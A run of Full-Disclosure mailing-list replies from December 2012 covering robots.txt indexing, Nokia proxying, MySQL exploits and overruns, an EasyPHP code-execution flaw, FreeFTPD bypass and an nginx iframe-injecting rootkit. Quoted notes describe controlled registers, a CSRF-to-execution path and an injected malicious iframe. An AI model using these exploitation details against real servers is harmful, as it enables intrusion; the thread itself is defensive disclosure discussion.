On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote: I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway. I kind of agree here. The information is valuable for the reconnaissance phase of an attack, buts its not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since its at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public). Jeff On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote: If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to it's logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when couple with actual security - but relying on it alone is just daft. Expecting to world to change so bad habits have no consequence is dangerously naive. I suspect you're looking to hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen to see in places that can be seen. On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote: /From/: Hurgel Bumpf l0rd_lunatic () yahoo com /Date/: Mon, 10 Dec 2012 19:25:39 + (GMT) Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not cleary a google vulnerability, but exposes websites informations that are not really intended to be public. Conan the bavarian Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question your raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must of missed the first day of web school. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robot.txt handling
On Tue, Dec 11, 2012 at 5:53 PM, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, it's a stupid idea. :) I prefer to know where I am with a service; and (IMHO) I would prefer to query (occasionally) Google for my CC instead of waiting for someone to start taking funds off it. Hiding it only provides a false sense of security - it will last until someone finds the service leaking out CCs. Agreed. How about search engine data by other crawlers that was not sanitized? This is especially the case with robots.txt. Can someone on the list please define a good web crawler? Haha! Milk up the nose. I think the problem here is that people are plain stupid and throw in direct entries inside robots.txt, whereas they should be sending wildcard entries. Couple that with actually protecting sensitive areas, and it's a pretty good defence. We now know you don't need a robots.txt for exclusion. Just ask Weev. Jeff On Tue, Dec 11, 2012 at 10:38 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Dec 11, 2012 at 4:11 PM, Mario Vilas mvi...@gmail.com wrote: I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway. I kind of agree here. The information is valuable for the reconnaissance phase of an attack, buts its not a vulnerability per se. But what is to stop the attacker from fetching it himself/herself since its at a known location for all sites? In this case, Google would be removing aggregated search results (which means the attacker would have to compile it himself/herself). Google removed other interesting searches, such as social security numbers and credit card numbers (or does not provide them to the general public). Jeff On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote: If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to it's logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when couple with actual security - but relying on it alone is just daft. Expecting to world to change so bad habits have no consequence is dangerously naive. I suspect you're looking to hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen to see in places that can be seen. On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote: /From/: Hurgel Bumpf l0rd_lunatic () yahoo com /Date/: Mon, 10 Dec 2012 19:25:39 + (GMT) Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not cleary a google vulnerability, but exposes websites informations that are not really intended to be public. Conan the bavarian Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question your raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must of missed the first day of web school. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Removing seless email addresses (on FD list)
On Tue, Dec 11, 2012 at 5:58 PM, Christian Sciberras uuf6...@gmail.com wrote: John (Cartwright), It is quite annoying to have a volley of bounce mail form non-existent/(re)moved mailboxes. Can't we somehow limit this? I recall in other newsgroups software, several bounced(reply) emails to a periodic (monthly? bimonthly?) ping would automatically retire the email in question (perhaps after a warning or something such). +1 Ditto for BugTraq. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nokia phone forcing traffic through proxy
On Fri, Dec 7, 2012 at 11:55 AM, Gaurang Pandya gaub...@yahoo.com wrote: It has been noticed that internet browsing traffic, instead of directly hitting requested server, is being redirected to proxy servers. They get redirected to Nokia/Ovi proxy servers if Nokia browser is used, and to Opera proxy servers if Opera Mini browser is used. More detailed info at : http://gaurangkp.wordpress.com/2012/12/05/nokia-proxy/ It sounds a lot like http://click-fraud-fun.blogspot.com/. We know proxies can cause a lot of trouble in practice. For example, http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html. Proxies and data snatching are the reason to pin certificates when using VPN and SSL/TLS if a pre-existing relationship exists (for example, you know the host and its public key). Are you talking to an Nokia/Ovi proxy, an Interception proxy (perhaps enabled by Trustwave), or the host expected during a SSL/TLS negotiation? We now have a much better body of knowledge. Its too bad most browser don't offer the features for those who are security conscious. On Android, Google went so far as to offer pinning as opt-in for sites: http://groups.google.com/group/android-security-discuss/browse_thread/thread/f5898be7ee9abc48. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
On Fri, Dec 7, 2012 at 3:39 PM, Rajesh Malepati chitt...@gmail.com wrote: On Thu, Dec 6, 2012 at 7:08 AM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Dec 3, 2012 at 11:03 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Yes I agree, we should discard this default remote vulnerability because it is documented. Devil's advocate: Does a questionable design choice/feature that is documented make it any less vulnerable? Looks like someone's sarcasm detector is broken. Doh, I'm used to him being more serious.. Sorry about the extra chatter. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
On Mon, Dec 3, 2012 at 11:03 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Yes I agree, we should discard this default remote vulnerability because it is documented. Devil's advocate: Does a questionable design choice/feature that is documented make it any less vulnerable? How does a Mom and Pop shop who were told to get mySQL to support some business software mitigate this issue when its insecure out of the box and there are no IT resources? Jeff 2012/12/2 Sergei Golubchik s...@askmonty.org: Thanks, Kurt! 2012/12/2 Kurt Seifried kseifr...@redhat.com: *** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. So in the case of this issue it appears to be documented (UDF, do not run MySQL as administrator, etc.). As I understand CVE assignment rules this issue does not require a CVE, however just to be on the safe side I'm CC'ing MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Just to confirm - yes, it's documented. UDF is a feature that allows to run any code in the MySQL server process. FILE privilege allows to create files. So yes, sure, with the appropriate privileges and the appropriately configured server one can create a file and load it as UDF. As expected. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL Local/Remote FAST Account Password Cracking
On Mon, Dec 3, 2012 at 1:13 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: ... Since the SALT does not change (and this is the weak point) in the change_user command it is a convenient way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server). ... Somewhat relevant here Salt has been recently shown to be a good thing: Multi-Instance Security and its Application to Password-Based Cryptography (http://eprint.iacr.org/2012/196.pdf). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EasyPHP 12.1 - Remote code execution of any php/js on local PC
Yes, we have responsibility, but no enough time to make a new release. ... This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft. ... So stop crying, kiddy. Conclusion: Better think twice before using a software from developers like this. There are alternatives to EasyPHP. That sounds like a Pwnie Award nomination for the lamest vendor response. http://pwnies.com. Jeff On Sat, Dec 1, 2012 at 5:51 AM, auto59190...@hushmail.com wrote: Follow-Up to http://seclists.org/fulldisclosure/2012/Nov/7 EasyPHP 12.1 - Remote code execution of any php/js on local PC Product: EasyPHP installs a complete WAMP environment for PHP developers in Windows including PHP, Apache, MySQL, PhpMyAdmin, Xdebug... - http://www.easyphp.org/ Problem: EasyPHP also provides a php Code Tester feature: If you want to quickly test a piece of code, enter your code in the field below and click on Interpret the code. codetester.php gets the php via a form which submits it to hardcoded url http://127.0.0.1/home/codetester.php There is no nonce or any other check about the origin of the post call. The php will then be written to a file /home/codesource.php and executed. If EasyPHP 12.1 is running on your PC and you visit an evil page on some server in internet with your browser, you are pwned. [...] Finally (sort of) an answer of the developers: Yes, we have responsibility, but no enough time to make a new release. ... This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft. ... So stop crying, kiddy. Conclusion: Better think twice before using a software from developers like this. There are alternatives to EasyPHP. And a hint to interested fellow researchers, there is much more failure in EasyPHP, but we stop crying, for now... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
On Sun, Dec 2, 2012 at 10:40 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: When you look into the heap and stack overrun the first obstacle to exploit the bugs is that MySQL does not allow all plain 0 to 255 characters, this means the exploiter would have to use unicode translation in order to exploit the bugs (therefore these are PoCs only by now). If the exploiter managed to execute code on default installs without your mentioned protections it might be possible to circumvent them, to be honest I didn't have a look into these optimizations and protections, it's hard enough to exploit it without these restrictions applied. No problem, thanks. Rodrigo pointed out a RO GOT (-z,relro) meant the GOT would be safe, but other areas were still vulnerable on the heap overflow. I think I'd take a hardened GOT and make the attacker move on to the next weak area. Its really a shame that high risk applications (such as those that take input from the Internet) are still failing in these ways in 2012. There's a lot of platform security available (and other hardening techniques), but folks chose not to use them. It's disappointing the various security teams have not improved the situation (they are the folks who should know, and should take a defensive posture). Jeff 2012/12/1 Jeffrey Walton noloa...@gmail.com: Hi Kingcope, # As seen below $edx and $edi are fully controlled, # the current instruction is # = 0x83a6b24 free_root+180: mov(%edx),%edi # this means we landed in a place where 4 bytes can be controlled by 4 bytes # with this function pointers and GOT entries can be rewritten to execute arbritrary code Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -z,noexecheap, -z,now, and -z,relro? For no-exec heaps., you need to be on Gentoo or other platforms which offer the remediation. Jeff On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi Kingcope, MySQL Server exploitable stack based overrun Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) unprivileged user (any account (anonymous account?), post auth) as illustrated below the instruction pointer is overwritten with 0x41414141 bug found by Kingcope this will yield a shell as the user 'mysql' when properly exploited Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -D_FORTIFY_SOURCES=2 and -fstack-protector-all? Jeff On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeFTPD Remote Authentication Bypass Zeroday Exploit (Stuxnet technique)
On Sat, Dec 1, 2012 at 5:07 PM, Aris Adamantiadis a...@0xbadc0de.be wrote: Hi Kcope You're late on this one: http://seclists.org/fulldisclosure/2010/Aug/132 It seems there is a disconnect or it appears they got the analysis wrong: Your request was examined. This is nothing more than a null pointer deference, which cannot be easily exploited. Le 1/12/12 22:26, king cope a écrit : (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] linux rootkit in combination with nginx
On Tue, Nov 27, 2012 at 10:41 AM, Gregor S. rc4...@googlemail.com wrote: More interesting than the rootkit itself is how it found it's way into the box. Chances are that Squeeze has a non-disclosed 0day, and that's worring me a bit... Its based on Linux, so there are probably a lot of non-disclosed 0-days. Folks like Dan Rosenberg have made a career out of finding Comp Sci 101 bugs because some of the developers are too l33t to use tools and analysis to find their mistakes. The OS's namesake is too arrogant for his own good (cf., GCC is crap, http://linux.derkeiler.com/Mailing-Lists/Kernel/2006-11/msg08325.html). Jeff On Mon, Nov 26, 2012 at 11:04 AM, dxp dxp2...@gmail.com wrote: Looks like a new rootkit according to Kaspersky [1] and some analysis released by CrowdStrike [2]. [1] https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections [2] http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html PS: Interesting to know if others found this on their servers or is this an isolated incident !? On Tue, Nov 13, 2012 at 10:19 AM, stack trace stacktrac...@gmail.com wrote: Hi there, We've discovered something which looks to us like a rootkit working together with proxy software like nginx. Our OS is debian squeeze and nginx 1.2.3. Here is what happened: We are running a web service and we got notified by some customers of us that they are getting redirected to some malicious sites. Somehow a hacker managed to inject an iframe into our http responses. I tried to do a telnet test on our nginx proxy and saw that even the bad request response which gets served directly from nginx contained the malicious iframe code. server { listen 80 default backlog=2048; listen 443 default backlog=2048 ssl; server_name _; access_log off; (...) location / { return 400; } } Doing a bad request nginx doesn't go to cache in this case - the return 400 makes nginx reply with a predefined response (a string in memory). Even this response contained an iframe like this: HTTP/1.1 400 Bad Request Server: nginx/1.2.3 Date: Wed, 07 Nov 2012 00:01:24 GMT Content-Type: text/html Content-Length: 353 Connection: close html headtitle400 Bad Request/title/head body bgcolor=whitestyleiframe src=http://malware-site/index.php;/iframe/div centerh1400 Bad Request/h1/center hrcenternginx/1.2.3/center We've done an strace on the running nginx process and discovered that the reply of the process actually didn't contain the malicious iframe. writev(3, [{HTTP/1.1 400 Bad Request\r\nServer..., 151}, {html\r\nheadtitle400 Bad Req..., 120}, {hrcenternginx/1.2.4/center..., 52}], 3) = 323 After a bit deeper digging we've found some kernel rootkit I've attached to this email and also some hidden processes were running on our proxy machine with names like write_startup_c and get_http_inj_fr (which sounds like what happened to us). Is this a known attack / rootkit etc or did we discover something new? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/